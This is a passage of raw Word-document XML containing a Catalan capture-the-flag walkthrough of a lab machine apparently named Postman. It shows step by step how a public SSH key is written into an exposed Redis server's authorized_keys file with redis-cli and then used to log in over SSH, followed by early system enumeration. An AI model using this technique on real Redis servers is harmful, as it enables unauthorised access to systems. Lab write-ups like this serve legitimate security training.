      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A5811" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"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0FE1478A" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">SHA256:EeVNfCMuoAg5j5G8a2UWONboOPyDhTiIS/Bz+MvP064 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti@marti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="508237EC" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>randomart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2EA83AD1" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>+---[RSA 3072]----+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E534DA" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>| . *    .....    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22294944" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">|. % o   .o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC86C7" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|*=.X o ......o . |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB484D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|B+B.B .  .. .    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63117ACD" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|.++O    S  .     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0F998" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oo.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93FE02" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>| . ... .         |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8458A3" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|    o.. .        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12492AC0" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>|     .E+.        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A6298" w14:textId="1BF9D0CF" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>+----[SHA256]-----+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F7FED" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="5ABCC952" w14:textId="567D38EA" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">11-&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764DE09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 (echo -e "\n\n"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id_rsa.pub; echo -e "\n\n") &gt; spaced_key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6D62F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cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> spaced_key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273BDE4" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>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88E1E" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">     │ File: spaced_key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381213D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>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E5033D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   1 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBA3272" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   2 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E1FD9" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   3 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218898E8" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   4 │ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> AAAAB3NzaC1yc2EAAAADAQABAAABgQDKvdko8bk2wLjGdXCJh8P9/eJhMuvhqTNB71TysfqOX/c9eZU0jtKOzVGqc/jVyh5S2ayRQOBHjYsKGb9uuV5KBKfV0DrBJ1VV4WxqwAM81PGKexMUW2/SQxh7RvH9Ouj/4DoeYKq/b03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105EC44A" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">     │ P2q+TVHGouhL6ZFPyWutigD8HfXTcmx1G7CVpuXdmBNcUlncpOQZ4sotTIghXtkUteR9qU+0aYi/+TmDg8qJUl5RZoxUb3yThWHTRGyb6rNQCMaFRbXiaslzok3RxPtWLd0XzaQs/HUJkg6ap4TQDecw3+In/xAqVSaqUR+S7h1MDBn1I8r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D13B7" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">     │ DTZkXOOm3gJDmS7v6vTi2YHbeJIrsJ0vRL7M0Y6H+AQ4QF3BosZEm97siTDySN46uzDhO7RXfNVrcwgZG6mPsEe2f4VLuJxyekCnm7xRYWqV3y/NqZFGmHnnRjVlSuwSKSwf39I1Ox177pif6INjYjA1bJpWcAIwqELNPya2aGhBR0I9gG6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A1C3D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">     │ cTeIMyhkSChI3c= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti@marti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DEA11F3" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   5 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF5D30" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   6 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366BFF9" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   7 │ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C0C1B" w14:textId="57DF7C83" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>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C2F209" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7273CB16" w14:textId="2F8A824A" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>12-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5A001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cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> spaced_key.txt | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis-cli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h 10.129.2.1 -x set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13E73060" w14:textId="70C81782" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A03E89" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="14D6C222" w14:textId="213844E4" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>13-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B101DC8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redis-cli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74534F5B" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">10.129.2.1:6379&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B183DC3" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06244E" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">10.129.2.1:6379&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbfilename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB7C3D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9D09C" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10.129.2.1:6379&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="645496BC" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F530C" w14:textId="1C27A59F" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>10.129.2.1:6379&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF274B" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="21689938" w14:textId="2C47FA27" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">14-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conectem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per SSH: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2492BB53" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="179468C8" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> redis@10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33848777" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authenticity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host '10.129.2.1 (10.129.2.1)' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>can't</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>established</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DACA7" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">ED25519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fingerprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E58D5D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>This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names</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756CE4A6" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">Are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continue </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connecting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (yes/no/[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>])? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CB986" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Warning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Permanently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'10.129.2.1' (ED25519)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hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB64862" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">** WARNING: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14:paraId="4E03B76F" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">**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vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "store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decrypt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" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1035F" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">**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upgraded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https://openssh.com/pq.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B62D9" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"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Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC0B1A" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="5EA2D057" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Documentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:  https://help.ubuntu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F8907" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve"> * Management:     https://landscape.canonical.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD888D6" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Support</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:        https://ubuntu.com/advantage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31067BE5" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="60CBC74C" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="04A996EA" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve"> * Canonical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Livepatch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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F3C7C" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">   - Reduce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reboots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. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Activate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58906B10" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">     https://ubuntu.com/livepatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37683521" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Last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: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 26 03:04:25 2019 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB178B" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4109C1A6" w14:textId="11530032" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5586E8BC" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="6AF9E4E4" w14:textId="5D3B2D7C" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:t>15-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> Hi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A04FF">
        <w:t>ha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> la user.txt al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A04FF">
        <w:t>directori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> del Matt, pero no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A04FF">
        <w:t>tenim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> permisos per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A04FF">
        <w:t>veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A04FF">
        <w:t>contingut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A04FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE18700" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="008C65E0"/>
    <w:p w14:paraId="25A78485" w14:textId="122B927E" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="008C65E0">
      <w:r>
        <w:t xml:space="preserve">16-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mirem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si es un Ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bionic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aixi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473577E" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="008C65E0"/>
    <w:p w14:paraId="1C1C9C14" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/home/Matt$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsb_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C7453" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t xml:space="preserve">No LSB modules are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>available</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D274B73" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
